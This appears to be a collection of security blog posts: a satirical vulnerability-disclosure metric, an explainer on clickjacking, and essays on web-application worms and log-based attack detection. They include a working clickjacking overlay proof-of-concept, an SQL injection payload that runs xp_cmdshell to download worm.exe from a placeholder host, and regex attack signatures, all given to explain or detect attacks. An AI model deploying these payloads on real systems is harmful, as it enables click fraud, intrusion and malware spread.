…seven of the most common vulnerabilities that plague web applications.
Vulnerability disclosure presents a complex challenge to the information security community. A reductionist explanation of the disclosure debate needs only two claims. One end of the spectrum goes, “Only the vendor need know, so no one else knows the problem exists, which means no one can exploit it.” The information-wants-to-be-free diametric opposition simply states, “Tell everyone as soon as the vulnerability is discovered.”
The Factor of Ultimate Doom (FUD) is a step towards reconciling this spectrum into a laser-focused compromise of agreement. It establishes a metric for evaluating the absolute danger inherent to a vulnerability, thus providing the discoverer with guidance on how to reveal the vulnerability.
The Factor is calculated by simple addition across three axes: Resources Expected, Protocol Affected, and Overall Impact. Vulnerabilities that do not meet any of the Factor’s criteria may be classified under the Statistically Irrelevant Concern metric, which will be explored at a later date.
Resources Expected
(2) Exploit shellcode requires fewer than 12 bytes. In other words, it must be more efficient than the export PS1=# hack (to which many operating systems, including OS X, remain vulnerable).
(1) Exploit shellcode requires a GROSS sled. (A GROSS sled uses opcode 144 on Intel x86 processors, whereas the more well-known NOP sled uses opcode 0x90.)

Protocol Affected
(3) The Common Porn Interchange Protocol (TCP/IP)
(2) Multiple online rhetorical opinion networks
(1) Social networks

Overall Impact
(3) Control every computer on the planet
(2) Destroy every computer on the planet
(1) Destroy another planet (obviously, the Earth’s internet would not be affected — making this a minor concern)
The resulting value is measured against an Audience Rating to determine how the vulnerability should be disclosed. This provides a methodology for verifying that a vulnerability was responsibly disclosed.
Audience Rating (by Factor of Ultimate Doom*)
(> 6) Can only be revealed at a security conference
(< 6) Cannot be revealed at a security conference
(< 0) Doesn’t have to be revealed; it’s just that dangerous
(*Due to undisclosed software patent litigation, values equal to 6 are ignored.)
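Since the Factor is just addition across the three axes, the whole methodology fits in a few lines. A tongue-in-cheek sketch (the function names are mine, not part of the official metric):

```javascript
// Factor of Ultimate Doom: simple addition across the three axes.
function factorOfUltimateDoom(resourcesExpected, protocolAffected, overallImpact) {
  return resourcesExpected + protocolAffected + overallImpact;
}

// Map a Factor to its Audience Rating. Per the footnote, a Factor of
// exactly 6 is ignored (undisclosed software patent litigation).
function audienceRating(factor) {
  if (factor === 6) return "ignored";
  if (factor > 6) return "can only be revealed at a security conference";
  if (factor < 0) return "doesn't have to be revealed; it's just that dangerous";
  return "cannot be revealed at a security conference";
}

// A sub-12-byte-shellcode exploit (2) against TCP/IP (3) that controls
// every computer on the planet (3): Factor = 8.
console.log(audienceRating(factorOfUltimateDoom(2, 3, 3)));
// → "can only be revealed at a security conference"
```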
So, I was asked to comment about clickjacking today. Technically, it isn’t a new vulnerability (IE6 fixed a variant in 2004; Firefox fixed a variant in September 2008) but rather a refinement of previous exploits, ennobled with a catchier name. It gained widespread coverage in October 2008 prior to the OWASP NYC conference, when Jeremiah Grossman and Robert Hansen first said they would describe the vulnerability, then cancelled their talk for fear of unleashing Yet Another Exploit of Ultimate Doom.* The updated technique combines devious DOM manipulation with well-established attack patterns to produce a respectable type of attack.
Clickjacking tricks a user into clicking on an attacker-supplied page while the user sees only the appearance and effect of clicking a plain link. The attacker identifies an area in the target HTML that should receive the click event. This HTML is placed within an IFRAME such that the X and Y offsets of the frame put the target area in the upper left-hand corner of the frame’s visible area. The target IFRAME is visually hidden from the user (though the element remains part of the DOM). Then, the IFRAME is set within a second page (the content of which doesn’t matter) beneath the mouse cursor and, very importantly, dynamically moves to always stay underneath the mouse. When the user clicks somewhere within the second page, the click is actually sent to the target area even though it appears to the user that the mouse is only above some innocuous link.

Essentially, an attacker chooses some web page that, if the victim clicked some point (link, button, etc.) on it, would produce some benefit to the attacker (e.g. generate click-fraud revenue, change a security setting, etc.). Next, the attacker takes the target page and places a second, innocuous page over it. The trick is to get the victim to make a mouse click on what appears to be the innocuous page, but is actually an invisible element of the target page that has been automatically, but invisibly, placed beneath the cursor.

The attack relies on luring a user to a server under the attacker’s control or to a site that has been compromised by the attacker. Web site owners who ensure their site is free of cross-site scripting or other vulnerabilities can prevent their sites from being used as a relay point for the attacker. Yet other successful attacks, such as phishing, also rely on luring users to a server under the attacker’s control.
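The overlay technique described above can be sketched in a few lines of HTML and CSS. This is a hypothetical illustration — the page, the target URL, and every pixel offset are invented for the example:

```html
<!-- attacker.html: the page the victim actually visits -->
<body>
  <p><a href="#">Click here for a free prize!</a></p>

  <!-- A small clipping window, fully transparent but still clickable. -->
  <div id="trap" style="position:absolute; width:30px; height:20px;
                        overflow:hidden; opacity:0;">
    <!-- The target page, shifted with negative offsets so the button
         the attacker cares about sits at the window's top-left corner.
         (Offsets here are invented for illustration.) -->
    <iframe src="https://bank.example/settings" scrolling="no"
            style="position:absolute; left:-200px; top:-150px;
                   width:800px; height:600px; border:0;"></iframe>
  </div>

  <script>
    // Keep the invisible window glued beneath the cursor, so that
    // wherever the victim clicks, the click lands on the framed target.
    document.addEventListener('mousemove', function (e) {
      var t = document.getElementById('trap');
      t.style.left = (e.pageX - 10) + 'px';
      t.style.top  = (e.pageY - 10) + 'px';
    });
  </script>
</body>
```

Note that an element with opacity:0 (unlike one with display:none) remains part of the DOM layout and still receives click events — which is exactly the property the attack abuses.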
The relative success of phishing implies that securing web applications at the server isn’t the whole solution, because users can be tricked into visiting malicious web sites. The core of the attack occurs in the browser, which is where the real fix needs to appear. The problem is that browsers are intended to handle HTML from many sources and provide mechanisms to manipulate the location and visibility of elements within a web page. Consequently, any solution would have to block this attack while not inhibiting legitimate uses of this functionality.
In 1998, L0pht claimed before Congress that in under 30 minutes their seven member group could make online porn and Trek fan sites unusable for several days. (That’s all that existed on the Internet in 1998.) In February 2002 an SNMP vulnerability threatened the very fabric of space and time (at least as it related to porn and Trek fan sites — if you still don’t believe me, consider that Google added Klingon language support the same month). More recently, a DNS vulnerability was (somewhat re-)discovered that could enable attackers to redirect traffic going to sites like google.com and wikipedia.com to sites that served porn, even though many people wouldn’t notice the difference. (Dan Kaminsky compiled a list of other apocalyptic vulnerabilities similar to the issues that plagued DNS.)
This year at the OWASP NYC AppSec 2008 Conference Jeremiah Grossman and Robert “RSnake” Hansen shared another vulnerability, clickjacking, in the Voldemort “He Who Must Not Be Named” style. In other words, yet another eschatonic vulnerability existed, but its details could not be shared. This disclosure method continued the trend from Black Hat 2008, prior to which the media and security discussion lists talked about the secretly-held, unsecretly-guessed DNS vulnerability with the speculation usually reserved for important things like when Gn’Fn’R would finally release Chinese Democracy. [If you don’t care about gory details of the disclosure drama and just want to skim the abattoir, then read this summary.]
[This was originally posted August 2003 on the now-defunct vulns.com site before the Samy worm and sophisticated XSS attacks appeared. In the five years since this was first posted, web applications still struggle with fixing XSS and SQL injection vulnerabilities. In fact, it’s still possible to discover web sites that put raw SQL statements in URL parameters.]
With the advent of the Windows RPC-based worm, security pros once again loudly lament the lack of patched servers, security-aware power users once again loudly blast Microsoft for (insert favorite negative adverb here) written code, and company parking lots at midnight still hold a few sticker-laden cars of sysadmins fixing the problem. Of course, there are a few differences, such as Joe and Jane’s home computers being caught red-handed exposing vulnerable ports (unlike SQL Slammer or the IIS worm of the month, which targeted servers not usually found in home networks), but the usual suspects still linger.
In fact, we could diverge onto many different topics when talking about worms. For starters, what’s the point of arguing against full disclosure when worms arise weeks (SQL Slammer, our RPC friend) or months (Nimda and Code Red) AFTER the patch has been released? Obviously, that sidesteps many arguments against full disclosure, but it’s food for thought. What about the plethora of port scanners and one-time “freebie scanners” that security companies pump out to capitalize on the hysteria? Yes, there are administrators who don’t know what’s on their network, but I’m willing to bet a larger number are trying to figure out how to test, update, and manage a patch for 100, 1,000, or 5,000+ systems. You can’t release a patch and expect it to be applied to 1,000 servers within 24 hours. The tools to manage the patch process are too few, while the number of scanners is overwhelming. That’s not to say that security scanning isn’t necessary — it’s just a small part of the process. Administrators need help with patch testing, installation, and management.
Okay, so I’ve diverged onto a few topics already; but the one I wanted to highlight is what happens when a worm exploits a Web Application vulnerability? Cgisecurity.com has a nice essay on one concept of such a worm. How easily could one spread? It may not be hard with a SQL injection and xp_cmdshell(). Who will be the scapegoat? It probably won’t involve cute references to “Billy Gates.” You can’t blame administrators for not being able to download a universal patch (although some ISAPI filters or Apache modules could prevent a lot of attacks). In the end, you have to return to the programmers. They must be aware that Web applications have vulnerabilities that don’t fall into the bloated category of “Buffer Overflow.”
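To see why SQL injection plus xp_cmdshell() makes worm propagation plausible, compare a query built by string concatenation with a parameterized one. A hypothetical sketch — the table name, the payload, and the placeholder convention are invented for illustration, and the safe form assumes a database driver that accepts bound parameters:

```javascript
// Vulnerable pattern: the id parameter is pasted straight into the SQL.
function buildQueryUnsafe(id) {
  return "SELECT name FROM products WHERE id = " + id;
}

// A worm doesn't send "42" -- it sends a payload that breaks out of the
// query and, on a permissive SQL Server, shells out via xp_cmdshell().
var payload =
  "42; EXEC master..xp_cmdshell 'tftp -i evil.example GET worm.exe'--";
console.log(buildQueryUnsafe(payload));
// The "query" now carries an attacker-chosen OS command.

// Safer pattern: keep data out of the SQL text entirely and let the
// driver bind it (placeholder syntax varies by driver; '?' is common).
function buildQuerySafe(id) {
  return { sql: "SELECT name FROM products WHERE id = ?", params: [id] };
}
```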
Buffer overflows are sexy to report when they involve popular software. Plus, it’s nice to see a group doing security research for fun. Yet when a worm finally targets Web applications, nmap and vulnerability scanners in the vein of nikto or nessus probably won’t cut it when administrators want to check whether their Web applications are vulnerable. Instead, they’ll want web application-aware tools to check live systems and code review tools to audit the source code. The proliferation of buffer overflows has led to some useful code review tools and compilers that can spot a minority of potential overflow vulnerabilities. OWASP is a good start. Hopefully, the tools to audit web applications and review source code will mature to the point that the next worm won’t spread through e-commerce applications. Everyone talks about how much worse a buffer overflow-based worm could have been, but a worm that gathers passwords and collects credit card numbers from an e-commerce application has more implications for the average Internet user than a worm erasing a company’s hard drives.
[This was originally posted July 2003 on the now-defunct vulns.com site. Even several years later no web application scanner can automatically identify such vulnerabilities in a reliable, accurate manner — many vulnerabilities still require human analysis.]
Sit and listen to Pink Floyd’s album, Wish You Were Here. “Can you tell a green field from a cold steel rail?” Yes. Could you tell a buffer overflow from a valid username in a Web application? Yes again. What about SQL injection, cross-site scripting, directory traversal attacks, or appending “.bak” to every file? Once again, Yes. In fact, many of these attacks have common signatures that could be thrown into Snort or passed through a simple grep command when examining application log files. These are the vulnerabilities that are reported most often on sites like www.cgisecurity.com or www.securityfocus.com. And they pop up for good reason: they’re dangerous and quickly cripple an e-commerce application.
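Many of these attacks really do leave grep-able signatures in access logs. A minimal sketch of the idea — the patterns and sample log lines are illustrative, not a complete or evasion-proof rule set:

```javascript
// Crude signatures for a few common web application attacks.
var signatures = {
  sqlInjection:       /('|%27).*(--|\bunion\b|\bselect\b)/i,
  directoryTraversal: /(\.\.\/|\.\.%2f)/i,
  crossSiteScripting: /(<script|%3cscript)/i,
  backupFileProbe:    /\.bak(\s|$|\?)/i
};

// Scan a log line and report the first signature it matches, if any.
function scanLogLine(line) {
  for (var name in signatures) {
    if (signatures[name].test(line)) return name;
  }
  return null;
}

var lines = [
  "GET /item.php?id=1'+UNION+SELECT+password--",
  "GET /../../etc/passwd",
  "GET /index.html"
];
lines.forEach(function (l) {
  console.log(scanLogLine(l));
});
// → sqlInjection, directoryTraversal, null
```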